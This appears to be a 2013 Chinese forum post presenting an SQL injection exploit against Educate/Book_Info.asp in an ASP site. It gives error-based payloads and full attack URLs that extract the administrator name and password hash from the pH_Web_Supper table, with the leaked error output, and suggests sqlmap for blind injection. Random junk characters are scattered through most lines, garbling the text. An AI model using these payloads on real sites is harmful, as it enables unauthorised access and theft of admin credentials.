漏洞出现在Educate/Book_Info.asp
3 B, n( T+ F3 @* s$ Y9 g3 c" \" g
+ j ]+ r1 U/ F4 V& O此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出( c8 Y; _. ~4 D* |# i( U! e
# f7 X9 }+ j% J! {
exp:如下+ e6 \" ~& d$ E0 C
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
) y( o! F, J+ {6 X& v# M4 t, ~5 @& E查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)6 O2 x# L" @7 f* |% I
6 n4 s) j5 `9 M {
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
% T N( u( n9 o6 ^% s# N7 X : t+ t, x6 _$ Z' N
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
, ~& \. x2 X5 R% l" { + D% ~0 J) J6 w7 T$ P3 J- K
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
3 S! T N/ l8 g( F0 D ; v( A, g0 S' Z$ ]9 i# \, F6 ]
/Educate/Book_Info.asp,行 83 K# n e5 w; t& V( k1 Z! z
% X A0 h4 Z% ?! S9 ~/ vhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
4 ]; S0 m* b R
% C5 W0 o/ [& g! b+ v/ mMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'$ d: \3 k7 [' F" ]) a1 s1 n3 j& d
# C7 W8 ?% L) _- f* Z: M, t
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
% \6 [& L6 T: k% ]' f 7 Z1 [+ W4 R U2 E7 Y9 i0 W$ o
/Educate/Book_Info.asp,行 8
5 ^$ G# X6 T9 m0 n |
发表于 2013-2-16 21:44:16
收藏
支持
反对